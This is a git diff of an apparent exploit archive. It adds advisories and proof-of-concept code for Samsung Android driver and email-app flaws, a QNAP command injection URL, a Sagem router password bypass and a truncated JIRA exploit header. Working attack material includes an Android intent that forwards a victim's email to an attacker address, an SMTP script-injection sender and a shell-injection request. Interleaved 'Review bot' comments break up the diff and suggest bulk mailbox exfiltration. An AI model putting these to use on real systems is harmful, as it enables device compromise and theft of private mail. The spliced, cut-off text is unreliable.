diff --git a/files.csv b/files.csv index b971bd7eb..0d1f8503e 100755 --- a/files.csv +++ b/files.csv 
@@ -34819,3 +34819,15 @@ id,file,description,date,author,platform,type,port 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 +38546,platforms/php/webapps/38546.txt,"Telaen 2.7.x Open Redirection Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 +38547,platforms/php/webapps/38547.txt,"CMS Gratis Indonesia 'config.php' PHP Code Injection Vulnerability",2013-06-04,"CWH Underground",php,webapps,0 +38548,platforms/php/webapps/38548.txt,"Telaen Information Disclosure Vulnerability",2013-06-03,"Manuel García Cárdenas",php,webapps,0 +38549,platforms/multiple/remote/38549.txt,"Apache Struts OGNL Expression Injection Vulnerability",2013-06-05,"Jon Passki",multiple,remote,0 +38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR and QNAP NAS Remote Code Execution Vulnerability",2013-06-05,"Tim Herres",cgi,webapps,0 +38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin Velocity Template Injection Vulnerability",2015-10-28,"Chris Wood",java,webapps,0 +38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 +38554,platforms/android/remote/38554.py,"Samsung SecEmailUI Script Injection",2015-10-28,"Google Security Research",android,remote,0 +38555,platforms/android/dos/38555.txt,"Samsung m2m1shot Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 +38556,platforms/android/dos/38556.txt,"Samsung seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 +38557,platforms/android/dos/38557.txt,"Samsung fimg2d FIMG2D_BITBLT_BLIT ioctl Concurrency 
Flaw",2015-10-28,"Google Security Research",android,dos,0 +38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0 diff --git a/platforms/android/dos/38555.txt b/platforms/android/dos/38555.txt new file mode 100755 index 000000000..b32ad0562 --- /dev/null +++ b/platforms/android/dos/38555.txt @@ -0,0 +1,39 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=493 + +The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server + +The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot: + +static long m2m1shot_compat_ioctl32(struct file *filp, + unsigned int cmd, unsigned long arg) +{ +... + switch (cmd) { + case COMPAT_M2M1SHOT_IOC_PROCESS: + { + struct compat_m2m1shot data; + struct m2m1shot_task task; + int i, ret; + + memset(&task, 0, sizeof(task)); + + if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) { + dev_err(m21dev->dev, + "%s: Failed to read userdata\n", __func__); + return -EFAULT; + } + + ... + for (i = 0; i < data.buf_out.num_planes; i++) { + task.task.buf_out.plane[i].len = + data.buf_out.plane[i].len; + ... + } + +In this code snippet, the data.buf_out.num_planes value is attacker-controlled "u8" value, and is not bounds checked. However, task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above. + +Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38555.zip + 
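Review bot: The advisory names the array size (three `plane` entries) and the unchecked `u8 num_planes`, but never states the check that closes the bug; a corpus reader wants it spelled out, e.g. `if (data.buf_out.num_planes > ARRAY_SIZE(task.task.buf_out.plane)) return -EINVAL;` placed before the `for` loop. Only the `buf_out` loop is quoted and the snippet is elided with `...` on both sides, so whether `buf_in` is copied by the same unbounded pattern cannot be seen here and should be confirmed against the driver source. Since `num_planes` is a `u8`, the loop writes at most 255 `plane` entries, so the stack overwrite is bounded by that many elements past the three-element array — worth stating, as it shapes what an exploit (rather than this DoS) could do.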
diff --git a/platforms/android/dos/38556.txt b/platforms/android/dos/38556.txt new file mode 100755 index 000000000..3d188708f --- /dev/null +++ b/platforms/android/dos/38556.txt @@ -0,0 +1,22 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=491 + +The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflow a static global buffer: + +static ssize_t esa_write(struct file *file, const char *buffer, + size_t size, loff_t *pos) +{ + struct esa_rtd *rtd = file->private_data; + unsigned char *ibuf; +… + ibuf = rtd->ibuf0; +... + /* receive stream data from user */ + if (copy_from_user(ibuf, buffer, size)) { + esa_err("%s: failed to copy_from_user\n", __func__); + goto err; + } + +Note that the user supplied buffer and size parameters are not adequately bounds checked. The destination buffer is fixed size, so memory corruption can occur. A simple proof-of-concept from a privileged shell can be used to trigger the issue (tested on a Samsung S6 Edge): + +# dd if=/dev/zero of=/dev/seiren count=5000000 + diff --git a/platforms/android/dos/38557.txt b/platforms/android/dos/38557.txt new file mode 100755 index 000000000..2b16bbd92 --- /dev/null +++ b/platforms/android/dos/38557.txt 
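Review bot: The PoC `dd if=/dev/zero of=/dev/seiren count=5000000` relies on dd's default 512-byte block, so every write() passes `size=512`, yet the advisory attributes the overflow to an unchecked `size` and never says how large `rtd->ibuf0` is — from the text alone it is not clear whether a single 512-byte write overruns the buffer or the corruption needs the repeated writes. An explicit oversized write (`dd if=/dev/zero of=/dev/seiren bs=1M count=1`) plus the buffer's allocated length would tie the PoC to the described defect. The remediation is also missing: `esa_write` needs `size` compared against the allocated length of `ibuf0` (rejecting with `-EINVAL`) before the `copy_from_user`. The quoted body is elided with `…`/`...` between `ibuf = rtd->ibuf0` and the copy, so that is where a reader would look to confirm no check exists.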
@@ -0,0 +1,60 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=492 + +The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition. + +The key observation is in the locking routine definitions in fimg2d.h: + +#ifdef BLIT_WORKQUE +#define g2d_lock(x) do {} while (0) +#define g2d_unlock(x) do {} while (0) +#define g2d_spin_lock(x, f) spin_lock_irqsave(x, f) +#define g2d_spin_unlock(x, f) spin_unlock_irqrestore(x, f) +#else +#define g2d_lock(x) mutex_lock(x) +#define g2d_unlock(x) mutex_unlock(x) +#define g2d_spin_lock(x, f) do { f = 0; } while (0) +#define g2d_spin_unlock(x, f) do { f = 0; } while (0) +#endif + +This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"): + +ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */ + +switch (cmd) { +case FIMG2D_BITBLT_BLIT: + + mm = get_task_mm(current); + if (!mm) { + fimg2d_err("no mm for ctx\n"); + return -ENXIO; + } + + g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */ + + ctx->mm = mm; + + ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg); + if (ret) { + ... + } + + ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */ + if (ret) { + ... + } + + g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */ + +As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor). 
+ +Reproduction steps: +Open /dev/fimg2d +Fork to get two processes with different mm’s with the access to the fd +Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes. +One ioctl should have valid data, the other should fail + +At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38557.zip + diff --git a/platforms/android/dos/38558.txt b/platforms/android/dos/38558.txt new file mode 100755 index 000000000..db8c27e05 --- /dev/null +++ b/platforms/android/dos/38558.txt 
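Review bot: The advisory shows that `g2d_lock` is a no-op under `BLIT_WORKQUE`, but doesn't state the remediation: the unserialized pair is the store `ctx->mm = mm;` and the use of `ctx->mm` inside `fimg2d_request_bitblt`, and both must sit under a lock that is real in that configuration — a per-ctx mutex is the natural choice, since a spinlock is only appropriate if nothing on the request path can sleep. The text also leaves open whether the previous `ctx->mm` reference obtained from `get_task_mm()` is released with `mmput` on the error path when a second caller overwrites it; if it isn't, the race leaks the mm as well as leaving a stale one, which should be confirmed in the driver source. The fork() in the reproduction steps is just a convenient way to share the descriptor; any two processes holding the same open file description can race the same ctx, so the "unprivileged" note applies to anything that can open `/dev/fimg2d`.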
@@ -0,0 +1,25 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=490 + +The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content. + +Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND +Component: com.samsung.android.email.composer +Class Name: com.samsung.android.email.composer.service.QuickReplyService + +The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number). + +If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example: + +Intent intent = new Intent(); +intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND"); +intent.setClassName("com.samsung.android.email.composer", + "com.samsung.android.email.composer.service.QuickReplyService"); +intent.putExtra("data", "{'original-msg-id':1, " + + "'account-id':'project.zero.victim@gmail.com', " + + "'msg':'Hello World!'," + + "'title':'Hello Title'," + + "'toList':'project.zero.attacker@gmail.com'}"); +ComponentName name = MainActivity.this.startService(intent); + +No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder. + diff --git a/platforms/android/remote/38554.py b/platforms/android/remote/38554.py new file mode 100755 index 000000000..b428ffe7e --- /dev/null +++ b/platforms/android/remote/38554.py 
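Review bot: The advisory states that `original-msg-id` "seems to be an incrementing number" and that an invalid ID simply returns, but doesn't draw the consequence: an unprivileged app can loop `original-msg-id` from 1 upward and forward every message in the account to `toList`, so this is bulk mailbox exfiltration rather than a single-message leak, with the only user-visible trace being the sent-folder entries the text mentions. `account-id` is the victim's own address, which is not a secret, so it provides no protection. A remediation line is missing — the service should be `android:exported="false"` (or guarded by a signature-level permission) in the manifest, since the text says no permission is required to call it.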
@@ -0,0 +1,52 @@ +# Source: https://code.google.com/p/google-security-research/issues/detail?id=494 + +''' +The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events. + +At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. + +This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server. + +Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed. +''' + +#!/usr/bin/env python + +import smtplib + +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText + +# Change the details here appropriate to your configuration +me = "attacker@gmail.com" +me_password = "THIS IS NOT REAL" +you = "project.zero.test@gmail.com" +smtp_server = "smtp.gmail.com" + +msg = MIMEMultipart('alternative') +msg['Subject'] = "Hello There!" +msg['From'] = me +msg['To'] = you + +text = "Hello There!" 
+html = """\ + +
+ ++ +
+ + +""" + +part1 = MIMEText(text, 'plain') +part2 = MIMEText(html, 'html') + +msg.attach(part1) +msg.attach(part2) + +s = smtplib.SMTP_SSL(smtp_server) +s.login(me, me_password) +s.sendmail(me, you, msg.as_string()) +s.quit() diff --git a/platforms/cgi/webapps/38550.txt b/platforms/cgi/webapps/38550.txt new file mode 100755 index 000000000..7be31360a --- /dev/null +++ b/platforms/cgi/webapps/38550.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/60354/info + +QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability. + +Successfully exploiting this issue may allow an attacker to execute arbitrary code with elevated privileges in the context of the user running the affected application. + +The following are vulnerable: + +QNAP VioStor NVR running firmware 4.0.3. +QNAP NAS + +http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami \ No newline at end of file diff --git a/platforms/hardware/webapps/38553.txt b/platforms/hardware/webapps/38553.txt new file mode 100755 index 000000000..b057d666a --- /dev/null +++ b/platforms/hardware/webapps/38553.txt 
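Review bot: `me_password` is a plaintext credential embedded in the script; read it at runtime instead of asking the user to edit a literal, e.g. `import getpass` and `me_password = getpass.getpass("SMTP password: ")`. The `#!/usr/bin/env python` line comes after the source comment and the docstring, so it is not a shebang and the file does not run by direct execution — it belongs on line 1. `smtplib.SMTP_SSL(smtp_server)` omits the port and `login`/`sendmail` are unchecked, which is acceptable for a PoC but deserves a one-line comment (`# raises smtplib.SMTPAuthenticationError on bad credentials`). The HTML body between the `html = """` quotes appears empty in this rendering of the hunk — presumably the `<script>` markup was stripped during extraction — so the file as shown does not carry the script tag the description depends on; that should be verified against the upstream file.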
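Review bot: The defect is OS command injection — `;` in `ping_ip=1;whoami` ends the ping command and the shell runs the remainder — but the entry only calls it "remote code-execution" and never names the parameter or metacharacter; a one-line statement such as `ping_ip is passed to a shell unescaped; ';' terminates the ping command and the rest is executed` would make the advisory usable. "QNAP NAS" is listed as affected with no firmware version, while VioStor NVR gets 4.0.3, so the NAS line needs a version if the SecurityFocus source provides one. The text also does not say whether `pingping.cgi` is reachable before authentication, which decides whether this is pre-auth RCE; that should be stated or marked unknown.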
@@ -0,0 +1,34 @@ +================================================================================ +____ _ _ ____ _ _ ____ _ _ ___ ____ ____ +|__| | | |__| |__| |__| |_/ |__] |__| |__/ +| | |___ |___ | | | | | | | \_ |__] | | | \ + +================================================================================ + + +###################################################### +# Exploit Title: Sagem javascript injection +# Date: 27/10/15 +# Exploit Author: Soufiane Alami Hassani +# Version: FAST3304-V2 +# Tested on: [Windows 8.1 Pro] +# Category : webapps +# Facebook : soufiane.a.hassani +# Email : nios1515@gmail.com +###################################################### + + +########################### +#By Soufiane Alami Hassani# +########################### + +Vulnerability Description : You can change the password of your router even if you have not the access. + +Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password . + +######################## +Moroccan Are The Best . +######################## + + +mimic_button('goto: 9096..') \ No newline at end of file diff --git a/platforms/java/webapps/38551.py b/platforms/java/webapps/38551.py new file mode 100755 index 000000000..b5666f76a --- /dev/null +++ b/platforms/java/webapps/38551.py @@ -0,0 +1,45 @@ +############################################################################ +# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability +# Date: 2015-08-26 +# CVE ID: CVE-2015-5603 +# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html +# +# Product: JIRA and the HipChat for JIRA plugin. +# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0 +# Affected JIRA product versions: 6.3.5 <= version < 6.4.11 +# +# Discovered internally by Atlassian (vendor) +# Proof of concept script by Chris Wood
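Review bot: The header titles this "Sagem javascript injection" while files.csv indexes the same entry as "Authentication Bypass", and what is described — calling the page's own `mimic_button('goto: 9096..')` from the address bar to reach the password-change page without logging in — is an authorization bypass (a hidden page with no server-side auth check), not script injection; the title should say so. The `javascript:` URL runs in the attacker's own browser against the router UI, so the precondition is network reachability of the admin interface, which the advisory should state along with a firmware version (only the model, FAST3304-V2, is given; "Tested on: Windows 8.1 Pro" is the client OS, not the target). Whether the password change is actually accepted server-side without a session, or the bypass only exposes the form, is not stated and should be confirmed before the entry is relied on.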